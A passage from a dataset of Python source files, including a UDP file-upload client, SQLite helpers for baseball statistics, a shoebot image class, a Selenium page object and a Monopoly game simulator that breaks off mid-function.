str(modelo1.N(\"aa\")))\n print(\"N de 'aab' para o modelo1: \" + str(modelo1.N(\"aab\")))\n print(\"N de 'aaa' para o modelo1: \" + str(modelo1.N(\"aaa\")))\n print(\"N de 'baaa' para o modelo2: \" + str(modelo2.N(\"baaa\")))\n print(\"N de 'aabaa' para o modelo1: \" + str(modelo2.N(\"aabaa\")))\n print()\n\n print(\"laplace de 'aaa' para modelo1: \\n\" + str(modelo1.laplace(\"aaa\")))\n print(\"laplace de 'aab' para modelo1: \\n\" + str(modelo1.laplace(\"aab\")))\n print(\"laplace de 'aac' para modelo1: \\n\" + str(modelo1.laplace(\"aac\")))\n print()\n\n\nif __name__ == '__main__':\n main()\n\n\n\n \n\n \n \n \n \n \n\n\n\n\n\n\n\n\n\n \n","sub_path":"markov_model.py","file_name":"markov_model.py","file_ext":"py","file_size_in_byte":6805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"22079682","text":"import io\nimport socket\nimport pickle\nimport threading\nimport time\nimport Packets\nfrom collections import deque\n\nclass ThreadACK (threading.Thread):\n def __init__(self, connection):\n threading.Thread.__init__(self)\n self.connection = connection\n self.lastPacketNum = -1\n self.numberOfPacket = 2147483647\n self.missingPacket = False\n self.missingPacketNum = -1\n self.finishRecvACK = False\n def run(self):\n\n timeSinceLastACK = 0\n startedWaiting = False\n\n while True:\n recvMessage = self.connection.recvfrom(1024)\n recvPacketNum = int(recvMessage[0].decode())\n\n if recvPacketNum == self.numberOfPacket - 1:\n self.finishRecvACK = True\n break\n\n if recvPacketNum == self.lastPacketNum and self.missingPacket == False:\n print(\"ERROR ACK no\", recvPacketNum, \"from I.P.\", recvMessage[1][0], \"port\", recvMessage[1][1])\n self.missingPacketNum = recvPacketNum\n self.missingPacket = True\n\n if recvPacketNum % 10 == 0:\n print(\"Received ACK no\", recvPacketNum, \"from I.P.\", recvMessage[1][0], \"port\", recvMessage[1][1])\n\n self.lastPacketNum = recvPacketNum\n\n\ndef sendPacket(myPacket, connectionSocket, address):\n try:\n if isinstance(myPacket, Packets.DataPacket):\n if myPacket.id % 10 == 0:\n print(\"Sending packet no\", myPacket.id, \"to I.P.\", address[0], \"port\", address[1])\n pickleString = pickle.dumps(myPacket)\n connectionSocket.sendto(pickleString, address)\n except OSError:\n pass\n except pickle.PicklingError as e:\n print(\"Pickle error({0})\".format(e))\n\ndef 
resendPacket(fromPacketNum, dataWindow, connectionSocket, address):\n    for packet in dataWindow:\n        if packet.id > fromPacketNum:\n            print(\"RESEND packet no \", packet.id)\n            sendPacket(packet, connectionSocket, address)\n\ndef upload(sendDestinationAddress, connectionSocket, fileName):\n    threadAck = ThreadACK(connectionSocket)\n\n    packetNum = 0\n    dataWindow = deque([])\n    finishReading = False\n    startedWaiting = False\n    startedWaitingTimeout = False\n\n    with open(fileName, \"rb\") as fileStream: # rb = read in binary mode\n        threadAck.start()\n\n        while not threadAck.finishRecvACK:\n            try:\n                if threadAck.missingPacket:\n                    resendPacket(threadAck.missingPacketNum, dataWindow, connectionSocket, sendDestinationAddress)\n                    threadAck.missingPacket = False\n\n                ### DATA WINDOW ###\n                if packetNum > threadAck.lastPacketNum + 8:\n\n                    if not startedWaitingTimeout:\n                        timeSinceLastACK = time.process_time()\n                        startedWaitingTimeout = True\n                    elif time.process_time() - timeSinceLastACK > 120: # give up if no new ACK arrives in time\n                        startedWaitingTimeout = False\n                        break\n\n                    if not startedWaiting:\n                        timeSinceLastResend = time.process_time()\n                        startedWaiting = True\n                    elif time.process_time() - timeSinceLastResend > 5: # time before resending from last ACK packet\n                        resendPacket(threadAck.lastPacketNum, dataWindow, connectionSocket, sendDestinationAddress)\n                        startedWaiting = False\n                    continue\n\n                startedWaitingTimeout = False\n\n                if dataWindow and dataWindow[0].id < threadAck.lastPacketNum:\n                    dataWindow.popleft()\n                ###################\n\n                if not finishReading:\n\n                    myPacket = Packets.DataPacket(packetNum, fileStream.read(900))\n\n                    if not myPacket.data:\n                        threadAck.numberOfPacket = packetNum\n                        finishReading = True\n                        continue\n\n                    dataWindow.append(myPacket)\n                    packetNum += 1\n\n                    # time.sleep(0.05)\n\n                    sendPacket(myPacket, connectionSocket, sendDestinationAddress)\n\n            except IOError as e:\n                print(\"I/O error({0})\".format(e))\n                break\n\n    print(\"Number of Packets:\", packetNum)\n\n    #### CLOSE ####\n    closingPacket = Packets.ClosingPacket()\n    sendPacket(closingPacket, connectionSocket, sendDestinationAddress)\n    ###############\n\n\n    threadAck.join()\n\n    fileStream.close()\n","sub_path":"Upload.py","file_name":"Upload.py","file_ext":"py","file_size_in_byte":4629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
+{"seq_id":"97487422","text":"import sqlite3\nfrom basic_tables import *\n\n__author__ = \"Albert Yu\"\n\n\ndef str_tuple(list_of_cols):\n    \"\"\"\n    Transforms a list [item1, item2, etc.] into a string of the tuple form \"(item 1, item 2, etc.)\" so\n    that it can be concatenated into an SQL query.\n    :param list_of_cols: a list, may contain different types\n    :return: a string representation of a tuple containing the items\n    \"\"\"\n    return str(tuple(list_of_cols))\n\n\ndef create_table(table_name, list_of_cols):\n    \"\"\"\n    Creates the string command for the SQL query for creating a new table\n    NOTE: the table name should NOT have a space. This will cause errors.\n    :param table_name: a string representing the table name\n    :param list_of_cols: a list of the desired column names\n    :return: string\n    \"\"\"\n    return \"CREATE TABLE IF NOT EXISTS \" + table_name + ' (' + ', '.join(list_of_cols) + ')'\n\n\ndef del_table(table):\n    \"\"\"\n    Creates the string form of the SQL query for deleting a table\n    :param table:\n    :return: string\n    \"\"\"\n    return \"DROP TABLE \" + table\n\n\ndef add_column(table, column_name):\n    \"\"\"\n    Returns the string form of the SQL query that appends the given column to the end of a table\n    :param table:\n    :param column_name:\n    :return: string\n    \"\"\"\n    return \"ALTER TABLE \" + table + \" ADD COLUMN \" + column_name\n\n\ndef insert_data(table, list_of_data):\n    \"\"\"\n    Returns the SQL command for inserting a row of data into a given table\n    :param table:\n    :param list_of_data:\n    :return: string command\n    \"\"\"\n    return \"INSERT INTO \" + table + \" VALUES \" + str_tuple(list_of_data)\n\n\ndef del_data(table, condition=\"\"):\n    \"\"\"\n    Deletes rows of the table with the optional specified condition\n    :param table: the string that represents the name of the table\n    :param condition: the string representation of the condition a row must satisfy to be deleted\n    (e.g. 'ID = 5', where 'ID' is a column name of the table)\n    :return: string command\n    \"\"\"\n    if len(condition) == 0:\n        return \"DELETE FROM \" + table\n    else:\n        return \"DELETE FROM \" + table + \" WHERE \" + condition\n\n\ndef select_all(table, order_by=\"\"):\n    \"\"\"\n    SQL query to select all rows of a table\n    :param table:\n    :param order_by: column parameter to order by\n    :return: string\n    \"\"\"\n    if len(order_by) == 0:\n        return \"SELECT * FROM \" + table\n    else:\n        return \"SELECT * FROM \" + table + \" ORDER BY \" + order_by\n\n\ndef create_mlb_table():\n    \"\"\"\n    Creates the table we need from the data. Deletes any existing version of the 'playerstats' table (the del_table call is currently commented out), so use with caution.\n    :return:\n    \"\"\"\n    conn = sqlite3.connect('mlbstats.db')\n\n    c = conn.cursor()\n    # c.execute(del_table('playerstats'))\n\n    # create empty table with columns\n    # 'list_of_stats' is a global variable from basic_tables.py\n    column_names = list_of_stats[:]\n    column_names.insert(0, 'team')\n    column_names.insert(0, 'name')\n    c.execute(create_table('playerstats', column_names))\n\n    teams = store_team_names(\"TEAM2015.csv\")\n    event_data = []\n    for team in teams:\n        event_data.append(file_to_array(\"2015eve/2015\" + team + \".csv\"))\n\n    league = League()\n\n    for team in teams:\n        league.add_team(team)\n        list_of_players = [row[0] for row in file_to_array(\"2015eve/\" + team + \"2015.ROS\")]\n        roster = Roster()\n        roster.add_list_of_players(list_of_players)\n        league.teams[team].add_roster(roster)\n\n    for team in league.teams:\n        play_by_play(event_data, league.teams[team].roster)\n\n    for team in league.teams.values():\n        for player in team.roster.players.values():\n            row = player.to_table_row()\n            # count up all stats\n            i = 1\n            while i < len(row):\n                row[i] = len(row[i])\n                i += 1\n            row.insert(1, team.team_name)\n            c.execute(insert_data('playerstats', row))\n\n    # note: table name is not case sensitive\n    # c.execute('SELECT * FROM playerstats ORDER BY team')\n    # for item in c:\n    #     print(item)\n\n    conn.commit()\n\n    conn.close()\n\n\ndef main():\n    conn = sqlite3.connect('mlbstats.db')\n\n    c = conn.cursor()\n\n    c.execute(add_column('playerstats', 'AB'))\n    conn.commit()\n\n    conn.close()\n\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"crud_tables.py","file_name":"crud_tables.py","file_ext":"py","file_size_in_byte":4381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
+{"seq_id":"249763247","text":"from shoebot.data import _copy_attrs\n\nimport array\nfrom StringIO import StringIO\nimport os.path\nfrom sys import platform\n\nimport cairo\nimport Image as PILImage\nimport gtk\n\nif platform != 'darwin':\n\timport rsvg\n\nfrom shoebot.data import Grob, ColorMixin\nfrom shoebot.util import RecordingSurface\n\nCENTER = 'center'\nCORNER = 'corner'\n\nclass Image(Grob, ColorMixin):\n    _surface_cache = {} # {filename: width, height, imagesurface}\n\n    def __init__(self, bot, path = None, x = 0, y = 0, width=None, height=None, alpha=1.0, data=None, pathmode=CORNER, **kwargs):\n        Grob.__init__(self, bot)\n        ColorMixin.__init__(self, **kwargs)\n\n        self.x = x\n        self.y = y\n        self.width = width\n        self.height = height\n        self.alpha = alpha\n        self.path = path\n        self.data = data\n        self._pathmode = pathmode\n        sh = sw = None # Surface Height and Width\n        \n        if isinstance(self.data, cairo.ImageSurface):\n            sw = self.data.get_width()\n            sh = self.data.get_height()\n            self._imagesurface = self.data\n        else:\n            # checks whether image data was passed in the command call; in this case it wraps\n            # the data in a StringIO object in order to use it as a file\n            # the data itself must contain an entire image, not just pixel data\n            # it can be useful for example to retrieve images from the web without \n            # writing temp files (e.g. 
using nodebox's web library, see example 1 of the library)\n # if no data is passed the path is used to open a local file\n if self.data is None:\n if path in self._surface_cache:\n sw, sh, imagesurface = self._surface_cache[path]\n elif os.path.splitext(path)[1].lower() == '.svg':\n handle = rsvg.Handle(path)\n sw, sh = handle.get_dimension_data()[:2]\n imagesurface = RecordingSurface(sw, sh)\n ctx = cairo.Context(imagesurface)\n handle.render_cairo(ctx)\n elif os.path.splitext(path)[1].lower() == '.png':\n imagesurface = cairo.ImageSurface.create_from_png(path)\n sw = imagesurface.get_width()\n sh = imagesurface.get_height()\n else:\n pixbuf = gtk.gdk.pixbuf_new_from_file(path)\n sw = pixbuf.get_width()\n sh = pixbuf.get_height()\n\n ''' create a new cairo surface to place the image on '''\n surface = cairo.ImageSurface(0, sw, sh)\n ''' create a context to the new surface '''\n ct = cairo.Context(surface)\n ''' create a GDK formatted Cairo context to the new Cairo native context '''\n ct2 = gtk.gdk.CairoContext(ct)\n ''' draw from the pixbuf to the new surface '''\n ct2.set_source_pixbuf(pixbuf, 0, 0)\n ct2.paint()\n ''' surface now contains the image in a Cairo surface '''\n imagesurface = ct2.get_target()\n self._surface_cache[path] = sw, sh, imagesurface\n else:\n img = PILImage.open(StringIO(self.data))\n\n if img.mode != 'RGBA':\n img = img.convert(\"RGBA\")\n \n sw, sh = img.size\n # Would be nice to not have to do some of these conversions :-\\\n bgra_data = img.tostring('raw', 'BGRA', 0, 1)\n bgra_array = array.array('B', bgra_data)\n imagesurface = cairo.ImageSurface.create_for_data(bgra_array, cairo.FORMAT_ARGB32, sw, sh, sw*4) \n\n if width is not None or height is not None:\n if width:\n wscale = float(width) / sw\n else:\n wscale = 1.0\n if height:\n hscale = float(height) / sh\n else:\n if width:\n hscale = wscale\n else: \n hscale = 1.0\n self._transform.scale(wscale, hscale)\n\n self.width = width or sw\n self.height = height or sh\n self._imagesurface = imagesurface\n\n self._deferred_render()\n\n \n def _render(self, ctx):\n if self.width and self.height:\n # Go to initial point (CORNER or CENTER):\n transform = self._call_transform_mode(self._transform)\n \n ctx.set_matrix(self._transform)\n ctx.translate(self.x, self.y)\n ctx.set_source_surface(self._imagesurface)\n ctx.paint()\n\n def draw(self):\n self._deferred_render()\n\n def _get_center(self):\n '''Returns the center point of the path, disregarding transforms.\n '''\n x = (self.x+self.width/2)\n y = (self.y+self.height/2)\n return (x,y)\n center = property(_get_center)\n\n def copy(self):\n p = self.__class__(self._bot, self.path, self.x, self.y, self.width, self.height)\n _copy_attrs(self._bot, p, self.stateAttributes)\n return p\n\n\n","sub_path":"data/codefile/shoebot@shoebot__0171fb9__shoebot$data$img.py.source.py","file_name":"shoebot@shoebot__0171fb9__shoebot$data$img.py.source.py","file_ext":"py","file_size_in_byte":5239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"591169327","text":"# inputOutput1\n\nimport math\n\n\nxyFile = open('xyData.txt','r')\n\nx_list = []\ny_list = []\n\nfor line in xyFile:\n x_list.append(float(line.split()[0]))\n y_list.append(float(line.split()[1]))\n \nxyFile.close()\nwriteFile = open('xyHypot.txt','w');\n\nfor i in range(len(x_list)):\n hypot = math.hypot(x_list[i],y_list[i])\n writeFile.write('\\t{0}\\t\\t{1}\\t\\t{2}\\n'.format(x_list[i],y_list[i],hypot))\n \nwriteFile.close()\n \n\n 
\n\n","sub_path":"csv_parse/inputOutput1.py","file_name":"inputOutput1.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"370573415","text":"# -*- coding: utf-8 -*-\nfrom framework.ui.base_page import BasePage\n\n\nclass CheckoutPage(BasePage):\n def __init__(self, driver):\n super().__init__(driver)\n\n locators = {\n 'address': ('ID', 'iaddress'),\n 'post_code' : ('ID', 'ipostcode'),\n 'city' : ('ID', 'itown'),\n 'name' : ('ID', 'isurname'),\n 'phone_number' : ('ID', 'iphonenumber'),\n 'email' : ('ID', 'iemail'),\n 'delivery_time' : ('ID', 'ideliverytime'),\n 'amount': ('XPATH', '//*[contains(@class,\"cart-row row-sum\")][@style!=\"display:none\"]/*[contains(@class,\"cart-sum-price\")]'),\n 'payment_selector' : ('ID', 'iselectpayment'),\n 'cash_payment' : ('XPATH', '//label[text()=\"Cash payment\"]'),\n 'amount_selector': ('ID', 'ipayswith'),\n 'order_and_pay': ('XPATH', '//input[@value=\"Order and pay\"]'),\n 'order_number': ('CLASS_NAME', 'order-purchaseid'),\n 'thanks_order': ('XPATH', '//*[text()=\"Thank you for your order!\"]')\n }","sub_path":"framework/ui/checkout_page.py","file_name":"checkout_page.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"540920093","text":"# # # # # # # # # # # # # # # #\n# Monopoly Simulator #\n# Created by Mitchell Eithun #\n# July 2014 - June 2015 #\n# # # # # # # # # # # # # # # #\n\nfrom random import randint, shuffle, choice # For random game elements.\nfrom decimal import Decimal, getcontext, ROUND_HALF_UP # The Decimal module for better rounding.\n\ngetcontext().rounding = ROUND_HALF_UP # Adjust the rounding scheme.\n\n\n\n# Define the Player class.\nclass Player:\n def __init__(self,\n number,\n buying_threshold=500,\n jail_time=3,\n smart_jail_strategy=False,\n complete_monopoly=0,\n development_threshold=0,\n building_threshold=5,\n group_preferences=(),\n initial_inventory=False,\n initial_money=False,\n evolving_threshold=0,\n group_ordering=(\"Brown\", \"Light Blue\", \"Pink\", \"Orange\",\n \"Red\", \"Yellow\", \"Green\", \"Dark Blue\", \"Utility\", \"Railroad\"),\n group_values=None,\n property_values=[0 for i in range(40)]\n ):\n self.number = number\n self.reset_values() # Reset the player's attributes if the player is used again.\n\n # Define initial conditions.\n self.initial_inventory = initial_inventory\n self.initial_money = initial_money\n\n if initial_money:\n self.money = initial_money\n\n # Strategy parameters.\n self.group_preferences = group_preferences\n self.development_threshold = development_threshold\n self.init_jail_time = jail_time\n self.jail_time = jail_time\n self.smart_jail_strategy = smart_jail_strategy\n self.building_threshold = building_threshold\n self.complete_monopoly = complete_monopoly\n self.buying_threshold = buying_threshold\n self.evolving_threshold = evolving_threshold\n self.property_values = property_values\n\n self.group_ordering = group_ordering\n self.group_ranking = {\"Brown\": 0, \"Light Blue\": 0, \"Pink\": 0, \"Orange\": 0,\n \"Red\": 0, \"Yellow\": 0, \"Green\": 0, \"Dark Blue\": 0,\n \"Utility\": 0, \"Railroad\": 0}\n\n for index in range(len(self.group_ordering)):\n self.group_ranking[self.group_ordering[index]] = index\n\n self.group_values = group_values\n\n # Reset a player's parameters so the same player can play in a series of games.\n def reset_values(self):\n # General attributes.\n 
self.position = 0 # The player starts on \"Go\".\n self.money = 1500 # The player starts with $1,500.\n self.chance_card = False # The player has no \"Get Out of Jail Free\" cards.\n self.community_chest_card = False # The player has no \"Get Out of Jail Free\" cards.\n self.in_jail = False # The player is not in jail.\n self.jail_counter = 0 # The \"turns in jail\" counter.\n self.card_rent = False\n self.inventory = [] # A list of the player's properties.\n self.monopolies = [] # A list of the player's monopolies.\n self.passed_go = False # Used for a house rule.\n self.money_changes = []\n\n # For auctions\n self.mortgage_auctioned_property = False\n self.auction_bid = 0\n\n # For house rules.\n self.bid_includes_mortgages = False\n\n def add_monopoly(self, group):\n if group not in [\"Railroad\", \"Utility\"]:\n self.monopolies.append(group)\n return\n\n # Used in analysis to add railroad and utility monopolies to player's lists of monopolies\n def add_railroads_and_utilities(self):\n railroad_counter = 0\n utility_counter = 0\n for property in self.inventory:\n if property.group == \"Railroad\":\n railroad_counter += 1\n elif property.group == \"Utility\":\n utility_counter += 1\n\n if railroad_counter == 4:\n self.monopolies.append(\"Railroad\")\n\n if utility_counter == 2:\n self.monopolies.append(\"Utility\")\n\n # Unmortgage properties in monopolies if possible, in accordance with buying threshold.\n def unmortgage_monopolied_properties(self, game_info):\n for board_space in self.inventory:\n if board_space.mortgaged and board_space.group in self.monopolies:\n unmortgage_price = game_info.unmortgage_price(board_space)\n if self.money - unmortgage_price >= self.get_buying_threshold(game_info):\n self.money -= unmortgage_price # Pay un-mortgage price.\n board_space.mortgaged = False # Un-mortgage property.\n pass # ##print(\"player\",self.number,\"unmortgaged\",board_space.name)\n else:\n # We can't unmortgage anything else.\n return\n\n # Attempt to develop properties in monopolies.\n def buy_buildings(self, game_info):\n # # Buy buildings. 
# #\n if self.monopolies:\n keep_building = True # Initial condition.\n while keep_building:\n keep_building = False # Don't keep building unless something is bought.\n for board_space in self.inventory: # Cycle through player inventory.\n if board_space.group in self.monopolies: # It's in a monopoly.\n if self.even_building_test(board_space) and not board_space.mortgaged: # Building \"evenly\".\n if board_space.buildings < 5: # self.building_threshold: # Check player's building limit.\n\n # Check if there is a building available.\n building_supply = 0\n if board_space.buildings < 4: # Ready for a house.\n building_supply = game_info.houses # The number of houses available\n building = \"house\"\n elif board_space.buildings == 4: # Ready for a hotel.\n building_supply = game_info.hotels # The number of hotels available\n building = \"hotel\"\n\n '''group_building_cost = 0\n if building == \"house\":\n for prop in self.inventory:\n if prop.group != board_space.group:\n if 1 <= prop.buildings <= 4:\n if group_building_cost == 0 or prop.house_cost < group_building_cost:\n group_building_cost = prop.house_cost\n\n if group_building_cost:\n building_supply += 1'''\n\n if building_supply > 0:\n\n # Calculate current cash available.\n if self.development_threshold == 1:\n # The player will use all but $1 to buy.\n available_cash = self.money - 1\n elif self.development_threshold == 2:\n available_cash = self.find_available_mortgage_value() + self.money - 1\n else:\n available_cash = self.money - self.get_buying_threshold(game_info)\n\n # The player can afford it.\n if available_cash - board_space.house_cost >= 0:\n\n # Build!\n if building == \"house\":\n game_info.houses -= 1 # Take 1 house.\n elif building == \"hotel\":\n game_info.hotels -= 1 # Take 1 hotel.\n game_info.houses += 4 # Put back 4 houses.\n\n board_space.buildings += 1 # Add building to property.\n self.money -= board_space.house_cost # Pay building cost.\n\n if self.development_threshold != 2 and self.money < 0:\n pass # ##print(\"error 9\", self.money)\n\n # Mortgage properties to pay for building.\n if self.development_threshold == 2:\n property_index = 0\n while self.money <= 0:\n c_property = self.inventory[property_index]\n if c_property.group not in self.monopolies and not c_property.mortgaged:\n c_property.mortgaged = True\n pass # ##print(\"player\",self.number,\"mortgaged\",board_space.name)\n self.money += c_property.price / 2\n property_index += 1\n\n keep_building = True # Allow the player to build again.\n game_info.first_building = True # Buildings have been built.\n\n if game_info.hotel_upgrade or game_info.building_sellback:\n # # Buy hotels if we have exhausted houses # #\n if game_info.houses == 0:\n for group in self.monopolies:\n house_disparity = 0\n properties_in_group = 0\n house_cost = 0\n houses_found = 0\n for board_space in self.inventory:\n if board_space.group == group:\n properties_in_group += 1\n house_cost = board_space.house_cost\n house_disparity += 5 - board_space.buildings\n houses_found += board_space.buildings\n\n # There are houses to build.\n if house_disparity > 0:\n # Check if there are enough hotels available.\n if game_info.hotels >= properties_in_group:\n\n # Calculate current cash available.\n if self.development_threshold == 1:\n # The player will use all but $1 to buy.\n available_cash = self.money - 1\n elif self.development_threshold == 2:\n available_cash = self.find_available_mortgage_value() + self.money - 1\n else:\n available_cash = self.money - 
self.get_buying_threshold(game_info)\n\n house_costs = []\n for prop in self.inventory:\n if prop.group != group:\n if prop.buildings != 5:\n for house in range(prop.buildings):\n house_costs.append(prop.house_cost)\n\n keep_going = True\n if len(house_costs) < house_disparity and game_info.building_sellback: # TODO\n keep_going = False\n\n if keep_going:\n house_costs.sort()\n total_house_costs = 0\n for i in range(house_disparity):\n total_house_costs += house_costs[i] / 2\n\n # Check if we can afford it.\n if available_cash - (house_disparity * house_cost) - total_house_costs >= 0:\n\n # Build!\n for property in self.inventory:\n if property.group == group:\n property.buildings = 5\n game_info.hotels -= 1\n game_info.houses += houses_found\n\n # Pay for it.\n self.money -= (house_cost * house_disparity) + total_house_costs\n\n if self.development_threshold != 2 and self.money < 0:\n pass # ##print(\"error 9\", self.money)\n\n # Mortgage properties to pay for buildings.\n if self.development_threshold == 2:\n property_index = 0\n while self.money <= 0:\n c_property = self.inventory[property_index]\n if c_property.group not in self.monopolies and not c_property.mortgaged:\n c_property.mortgaged = True\n pass # ##print(\"player\",self.number,\"mortgaged\",c_property.name)\n self.money += c_property.price / 2\n property_index += 1\n\n # # Un-mortgage singleton properties. # #\n def unmortgage_properties(self, game_info):\n for board_space in self.inventory:\n if board_space.mortgaged:\n unmortgage_price = game_info.unmortgage_price(board_space)\n if self.money - unmortgage_price >= self.get_buying_threshold(game_info):\n self.money -= unmortgage_price # Pay un-mortgage price.\n board_space.mortgaged = False # Un-mortgage property.\n pass # ##print(\"player\",self.number,\"unmortgaged\",board_space.name)\n else:\n return # Exit if the player doesn't have enough money to continue.\n\n # # Trade to form monopolies. 
# # TODO\n def board_order_trading(self, game_info):\n group_number = {\"Brown\": 0, \"Light Blue\": 1,\n \"Pink\": 2, \"Orange\": 3,\n \"Red\": 4, \"Yellow\": 5,\n \"Green\": 6, \"Dark Blue\": 7}\n group_name = [\"Brown\", \"Light Blue\", \"Pink\", \"Orange\",\n \"Red\", \"Yellow\", \"Green\", \"Dark Blue\"]\n properties_in_group = [2, 3, 3, 3, 3, 3, 3, 2]\n\n # Tally properties for playerA.\n playerA = self\n group_countsA = [0, 0, 0, 0, 0, 0, 0, 0] # To store property counts.\n # Loop through player's properties.\n for property in playerA.inventory:\n if property.group not in [\"Railroad\", \"Utility\"]:\n group_num = group_number[property.group]\n group_countsA[group_num] += 1\n\n # Tally properties for playerB.\n for playerB in game_info.active_players:\n if playerB == playerA:\n continue # A player cannot trade with themselves.\n group_countsB = [0, 0, 0, 0, 0, 0, 0, 0] # To store property counts.\n for property in playerB.inventory:\n if property.group not in [\"Railroad\", \"Utility\"]:\n group_num = group_number[property.group]\n group_countsB[group_num] += 1\n\n # Add the counts.\n group_counts = [sum(x) for x in zip(group_countsA, group_countsB)]\n\n # Check if consecutive property groups are complete.\n for i in [0, 1, 2, 3, 4, 5, 6]:\n j = i + 1 # The \"forward\" property group.\n # Check if we have all the properties in the group.\n if group_counts[i] == properties_in_group[i] and group_counts[j] == properties_in_group[j]:\n # Check if each player can contribute.\n if group_countsA[i] > 0 and group_countsB[i] > 0:\n if group_countsA[j] > 0 and group_countsB[j] > 0:\n\n # Shuffle the names of the consecutive two groups.\n group_names = [group_name[i], group_name[j]]\n shuffle(group_names)\n\n # playerB takes properties from playerA. Iterate over a copy: the list is mutated.\n for property in list(playerA.inventory):\n if property.group == group_names[0]:\n playerB.inventory.append(property)\n playerA.inventory.remove(property)\n playerB.add_monopoly(group_names[0])\n\n # playerA takes properties from playerB. Iterate over a copy: the list is mutated.\n for property in list(playerB.inventory):\n if property.group == group_names[1]:\n playerA.inventory.append(property)\n playerB.inventory.remove(property)\n playerA.add_monopoly(group_names[1])\n\n def ranking_trading(self, game_info):\n group_number = {\"Brown\": 0, \"Light Blue\": 1,\n \"Pink\": 2, \"Orange\": 3,\n \"Red\": 4, \"Yellow\": 5,\n \"Green\": 6, \"Dark Blue\": 7,\n \"Utility\": 8, \"Railroad\": 9}\n group_name = [\"Brown\", \"Light Blue\", \"Pink\", \"Orange\",\n \"Red\", \"Yellow\", \"Green\", \"Dark Blue\",\n \"Utility\", \"Railroad\"]\n properties_in_group = [2, 3, 3, 3, 3, 3, 3, 2, 2, 4]\n\n # Tally properties for playerA.\n playerA = self\n group_countsA = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0] # To store property counts.\n # Loop through player's properties.\n for property in playerA.inventory:\n group_num = group_number[property.group]\n group_countsA[group_num] += 1\n\n # Tally properties for playerB.\n for playerB in game_info.active_players:\n if playerB != playerA:\n group_countsB = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0] # To store property counts.\n for property in playerB.inventory:\n group_num = group_number[property.group]\n group_countsB[group_num] += 1\n\n # Find all new monopolies that could be formed by trading.\n complete_groups = []\n for index in range(len(group_countsA)):\n if properties_in_group[index] == group_countsA[index] + group_countsB[index]:\n if properties_in_group[index] != group_countsA[index]:\n if properties_in_group[index] != group_countsB[index]:\n complete_groups.append(group_name[index])\n\n # Keep going if there are potential monopolies.\n if 
complete_groups:\n # Find the order that playerA would like to trade in.\n ordered_groups = []\n for group in playerA.group_ordering:\n if group in complete_groups:\n ordered_groups.append(group)\n\n # Reverse that order.\n reversed_groups = list(reversed(ordered_groups))\n\n # A list of pairs of monopolies as playerA would have it\n pairs_of_groups = []\n for i in range(len(ordered_groups)):\n if ordered_groups[i] != reversed_groups[i]:\n if group_countsA[group_number[reversed_groups[i]]] == group_countsB[\n group_number[ordered_groups[i]]]:\n pairs_of_groups.append([ordered_groups[i], reversed_groups[i]])\n\n finished_groups = []\n # print(pairs_of_groups)\n # Loop through all pairs of possible trades\n for group_pair in pairs_of_groups:\n group1 = group_pair[0]\n group2 = group_pair[1]\n\n\n # Check if a group in the pair has already been completed.\n if group1 not in finished_groups and group2 not in finished_groups:\n # See if playerA wants group1 and playerB wants group2.\n if playerA.group_ranking[group1] < playerA.group_ranking[group2]:\n if playerB.group_ranking[group2] < playerB.group_ranking[group1]:\n\n\n # playerB takes all properties from playerA in group2\n for property in list(playerA.inventory):\n if property.group == group2:\n playerB.inventory.append(property)\n playerA.inventory.remove(property)\n playerB.add_monopoly(group2)\n\n # playerA takes all properties from playerB in group1\n for property in list(playerB.inventory):\n if property.group == group1:\n playerA.inventory.append(property)\n playerB.inventory.remove(property)\n playerA.add_monopoly(group1)\n finished_groups.extend(group_pair)\n # print('traded:', group_pair)\n\n\n # Called between turns.\n def between_turns(self, game_info):\n # Un-mortgage properties in monopolies, if possible.\n self.unmortgage_monopolied_properties(game_info)\n\n # Attempt to buy buildings.\n self.buy_buildings(game_info)\n\n # Unmortgage properties.\n self.unmortgage_properties(game_info)\n\n # Old trading scheme\n if game_info.trading_enabled and not game_info.new_trading:\n self.board_order_trading(game_info)\n\n # New trading scheme\n if game_info.new_trading:\n self.ranking_trading(game_info)\n\n # Even newer trading scheme\n if game_info.complex_trading:\n self.trading(game_info)\n\n # Even newer trading scheme (2)\n if game_info.complex_trading2:\n self.trading2(game_info)\n\n # Trading with individual properties\n if game_info.property_trading:\n self.property_trading(game_info)\n\n if game_info.discrete_property_trading:\n self.discrete_property_trading(game_info)\n\n # Sophisticated trading with money.\n def trading(self, game_info):\n group_number = {\"Brown\": 0, \"Light Blue\": 1,\n \"Pink\": 2, \"Orange\": 3,\n \"Red\": 4, \"Yellow\": 5,\n \"Green\": 6, \"Dark Blue\": 7,\n \"Utility\": 8, \"Railroad\": 9}\n group_name = [\"Brown\", \"Light Blue\", \"Pink\", \"Orange\",\n \"Red\", \"Yellow\", \"Green\", \"Dark Blue\",\n \"Utility\", \"Railroad\"]\n properties_in_group = [2, 3, 3, 3, 3, 3, 3, 2, 2, 4]\n\n # Tally properties for playerA.\n playerA = self\n group_countsA = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0] # To store property counts.\n # Loop through player's properties.\n for property in playerA.inventory:\n group_num = group_number[property.group]\n group_countsA[group_num] += 1\n\n # Tally properties for playerB.\n for playerB in game_info.development_order:\n if playerB != playerA:\n group_countsB = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0] # To store property counts.\n for property in playerB.inventory:\n group_num = 
